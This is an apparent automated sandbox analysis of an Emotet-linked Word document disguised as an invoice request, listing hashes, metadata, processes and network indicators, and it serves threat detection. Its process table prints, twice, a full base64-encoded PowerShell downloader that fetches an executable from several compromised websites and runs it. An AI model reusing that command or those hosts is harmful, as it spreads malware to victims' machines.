File name: | INVOICE COPY REQUEST_P_8284.doc |
Full analysis: | https://app.any.run/tasks/6c9d7661-7801-4764-83a7-9ad74259ad6e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 13:59:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Facilitator, Subject: proactive, Author: Wilfrid Schulist, Keywords: payment, Comments: Supervisor, Template: Normal.dotm, Last Saved By: Addie Simonis, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 22:22:00 2019, Last Saved Time/Date: Tue Oct 8 22:22:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 177, Security: 0 |
MD5: | BB2B9E7C852F37FD374CE1877FDD868A |
SHA1: | DFBEE6FD7997F81FDF2718922EC04A13D961B042 |
SHA256: | F8088422B9FCCF20927D24F71BC3379C459DFEBE47930A7191C101DC5765EB9A |
SSDEEP: | 6144:S57I3olKUzSMnLx3FHBXyaBiG6EUqnUPse:S57I3o8UGMt3Fh7BiG6PXPs |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Simonis |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 206 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Spencer - Herzog |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 177 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:10:08 21:22:00 |
CreateDate: | 2019:10:08 21:22:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Addie Simonis |
Template: | Normal.dotm |
Comments: | Supervisor |
Keywords: | payment |
Author: | Wilfrid Schulist |
Subject: | proactive |
Title: | Facilitator |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2968 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\INVOICE COPY REQUEST_P_8284.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2304 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADUANQAwADEANwA4ADAAMgAwADYAPQAnAGMAYwAwADAAMwAyADEAOAAyADUAOAAwAGMAJwA7ACQAYgA1AHgAMAA0ADAANAA3ADMAMgAyACAAPQAgACcAMgA4ADAAJwA7ACQAYgBjAGIANgA3ADQAMAB4ADQAMQAxADYAPQAnAGIANgBjADUAMAAxADAANAAwAHgAMwAnADsAJABjADQAMwBjADgAeAA0ADYAMQA1ADAAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGIANQB4ADAANAAwADQANwAzADIAMgArACcALgBlAHgAZQAnADsAJAB4ADAAMABiADIAYgBjADkAMAA0AGMAPQAnAHgAMAA2AGIAeAA5ADEAeAAwAGIAMAA4ACcAOwAkAGMAMAAwADkAMAAwADAAeAA2AGIAMwA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBDAEwASQBlAG4AdAA7ACQAYgA1AGMANgA5ADAANwAwADEAMwAwADAANwA9ACcAaAB0AHQAcABzADoALwAvAHEAdQBhAG4AdAB1AG0AbgBlAHUAcgBvAGwAbwBnAHkALgBjAG8AbQAvAGMAOQB3AHAAdQBsAGgALwBqAHoAYgAyADgAaAA4AC0AbgBiADAAcgBuAHcANAA2AC0AMwAwADEANAA1ADQAOQAzADIANQAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AeAB1AHAAZQByAHcAZQBiAC4AYwBvAG0ALwBvAGcANgBwAGoALwBuAGUAawBJAGkAbABZAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBvAHAAZQBuAHcAYQB0AGUAcgBzAHcAaQBtAGwAaQAuAGMAbwBtAC8AcgBvAGEAdwBrAC8AOQBxAGoAeABqAHgAdwBlAGEALQBsAHIAdQBzAHcAeQB4AC0ANAA2ADUAMQA4ADMANQAyADEALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBlAHYAZQB4AHQAZQBuAHMAaQBvAG4AcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABnAHIAYQBkAGUALwByAHUAeQBqAGsAbwAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGQAaQBhAG0AbwBuAGQAZQBnAHkALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHcAdQBrAHMAZABnAHgAZwA5AG4ALQBwAGMAbQAtADYAOAA3ADAALwAnAC4AIgBTAHAAYABsAGkAVAAiACgAJwBAACcAKQA7ACQAYwAxADEAYgAxADEAYgAwAGMANgBjAD0AJwB4ADcAOQBiADAAYwA1AHgAMAAwADAAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAYgBjADAAYgA1ADAAMAAwADgAMAA2AGMAIABpAG4AIAAkAGIANQBjADYAOQAwADcAMAAxADMAMAAwADcAKQB7AHQAcgB5AHsAJABjADAAMAA5ADAAMAAwAHgANgBiADMALgAiAGQAYABvAFcAYABOAGAATABPAGEAZABGAEkAbABFACIAKAAkAGIAYwAwAGIANQAwADAAMAA4ADAANgBjACwAIAAkAGMANAAzAGMAOAB4ADQANgAxADUAMAApADsAJAB4AGIAMABiADQAeAAwADMANQA3ADMAPQAnAGIAMgA4AHgAMABjADEAMAA1ADEAeAAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAGMANAAzAGMAOAB4ADQANgAxADUAMAApAC4AIgBsAGAAZQBOAGcAVABoACIAIAAtAGcAZQAgADMANQA5ADEANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAFIAVAAiACgAJABjADQAMwBjADgAeAA0ADYAMQA1ADAAKQA7ACQAeAAwADQANABiADcAeAAwADAANAA0ADAAMAA9ACcAeABjADAAeABiAGIAOQAzADAAMAAwADQAMQAnADsAYgByAGUAYQBrADsAJABjADMAMAAxADUANgBiAGMAMQA0AHgANgA1AD0AJwB4ADEANgBiADMAeAAyADAANAA5ADYANQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB4AGMAMAB4ADAAOABiADAAOQAxADMAMAA9ACcAYgBiADYAMgBjADEAOQA4ADAAYwA1ADAAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3420 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADUANQAwADEANwA4ADAAMgAwADYAPQAnAGMAYwAwADAAMwAyADEAOAAyADUAOAAwAGMAJwA7ACQAYgA1AHgAMAA0ADAANAA3ADMAMgAyACAAPQAgACcAMgA4ADAAJwA7ACQAYgBjAGIANgA3ADQAMAB4ADQAMQAxADYAPQAnAGIANgBjADUAMAAxADAANAAwAHgAMwAnADsAJABjADQAMwBjADgAeAA0ADYAMQA1ADAAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGIANQB4ADAANAAwADQANwAzADIAMgArACcALgBlAHgAZQAnADsAJAB4ADAAMABiADIAYgBjADkAMAA0AGMAPQAnAHgAMAA2AGIAeAA5ADEAeAAwAGIAMAA4ACcAOwAkAGMAMAAwADkAMAAwADAAeAA2AGIAMwA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBDAEwASQBlAG4AdAA7ACQAYgA1AGMANgA5ADAANwAwADEAMwAwADAANwA9ACcAaAB0AHQAcABzADoALwAvAHEAdQBhAG4AdAB1AG0AbgBlAHUAcgBvAGwAbwBnAHkALgBjAG8AbQAvAGMAOQB3AHAAdQBsAGgALwBqAHoAYgAyADgAaAA4AC0AbgBiADAAcgBuAHcANAA2AC0AMwAwADEANAA1ADQAOQAzADIANQAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AeAB1AHAAZQByAHcAZQBiAC4AYwBvAG0ALwBvAGcANgBwAGoALwBuAGUAawBJAGkAbABZAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBvAHAAZQBuAHcAYQB0AGUAcgBzAHcAaQBtAGwAaQAuAGMAbwBtAC8AcgBvAGEAdwBrAC8AOQBxAGoAeABqAHgAdwBlAGEALQBsAHIAdQBzAHcAeQB4AC0ANAA2ADUAMQA4ADMANQAyADEALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBlAHYAZQB4AHQAZQBuAHMAaQBvAG4AcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABnAHIAYQBkAGUALwByAHUAeQBqAGsAbwAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGQAaQBhAG0AbwBuAGQAZQBnAHkALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHcAdQBrAHMAZABnAHgAZwA5AG4ALQBwAGMAbQAtADYAOAA3ADAALwAnAC4AIgBTAHAAYABsAGkAVAAiACgAJwBAACcAKQA7ACQAYwAxADEAYgAxADEAYgAwAGMANgBjAD0AJwB4ADcAOQBiADAAYwA1AHgAMAAwADAAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAYgBjADAAYgA1ADAAMAAwADgAMAA2AGMAIABpAG4AIAAkAGIANQBjADYAOQAwADcAMAAxADMAMAAwADcAKQB7AHQAcgB5AHsAJABjADAAMAA5ADAAMAAwAHgANgBiADMALgAiAGQAYABvAFcAYABOAGAATABPAGEAZABGAEkAbABFACIAKAAkAGIAYwAwAGIANQAwADAAMAA4ADAANgBjACwAIAAkAGMANAAzAGMAOAB4ADQANgAxADUAMAApADsAJAB4AGIAMABiADQAeAAwADMANQA3ADMAPQAnAGIAMgA4AHgAMABjADEAMAA1ADEAeAAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAGMANAAzAGMAOAB4ADQANgAxADUAMAApAC4AIgBsAGAAZQBOAGcAVABoACIAIAAtAGcAZQAgADMANQA5ADEANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAFIAVAAiACgAJABjADQAMwBjADgAeAA0ADYAMQA1ADAAKQA7ACQAeAAwADQANABiADcAeAAwADAANAA0ADAAMAA9ACcAeABjADAAeABiAGIAOQAzADAAMAAwADQAMQAnADsAYgByAGUAYQBrADsAJABjADMAMAAxADUANgBiAGMAMQA0AHgANgA1AD0AJwB4ADEANgBiADMAeAAyADAANAA5ADYANQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB4AGMAMAB4ADAAOABiADAAOQAxADMAMAA9ACcAYgBiADYAMgBjADEAOQA4ADAAYwA1ADAAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR1360.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2304 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A7L2H3M0DYURGT9XFS5H.temp | — | |
MD5:— | SHA256:— | |||
3420 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5OMWSQOQ2FDE9UQ0JW41.temp | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:A6EED262238EEEE830BEFA6550BA84C0 | SHA256:FB3DBC9E040239FE43CDCB1A25D2586A6A048B89A6582A81EA412AE900EEECBF | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC17530A.wmf | wmf | |
MD5:CB888DEC4BAE01A40AC25D60192AD8CF | SHA256:22ED1331BA33C2CFC10B6A7E20E7A607A806C85F21BB4820302A498D4AA37214 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\578DBF6.wmf | wmf | |
MD5:2D0A3959940CDA264D880FDBAF145585 | SHA256:75F604C7F17A8EC1EA7C747E41A254B96E1B0B26D7FF3887017AAEE68D8B9349 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37BD6E00.wmf | wmf | |
MD5:089B7464DB93FC0E3C76863ABD6DADB4 | SHA256:34A6743403F07ECC24EB89572990F6B375A83ADCB6D77F354CEB7D7BC5C75873 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8BD05DA2.wmf | wmf | |
MD5:997EC56D440CB5472430077CFA96E9CE | SHA256:C2A0A35829A70AC9EE29EFC6AF3BDCC0E593FC185020D9F782C69074FBFDDBCD | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43BF0374.wmf | wmf | |
MD5:9B7D75AFA166F59B75A03F23425D1AB0 | SHA256:B930C6FFBFB0CFB5FDE8FE96E3B5B727C9C198CE3A4EDDD878C1261FE1DA7D08 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E26764E5.wmf | wmf | |
MD5:D0C3BAC403C5171B0DEA44B8CC01EB39 | SHA256:8A2A70C4D5A71C0C47FC9F96C4524F1DA53B97083398D9B86D7F45CDDCD085CD |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2304 | powershell.exe | GET | 404 | 160.153.128.9:80 | http://www.diamondegy.com/wp-includes/wuksdgxg9n-pcm-6870/ | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2304 | powershell.exe | 45.56.100.50:80 | www.evextensions.com | Linode, LLC | US | unknown |
2304 | powershell.exe | 107.180.41.41:443 | www.xuperweb.com | GoDaddy.com, LLC | US | unknown |
2304 | powershell.exe | 160.153.128.9:80 | www.diamondegy.com | GoDaddy.com, LLC | US | malicious |
2304 | powershell.exe | 198.71.233.68:443 | quantumneurology.com | GoDaddy.com, LLC | US | suspicious |
2304 | powershell.exe | 107.180.2.5:443 | www.openwaterswimli.com | GoDaddy.com, LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
quantumneurology.com |
| suspicious |
www.xuperweb.com |
| unknown |
www.openwaterswimli.com |
| unknown |
www.evextensions.com |
| unknown |
www.diamondegy.com |
| malicious |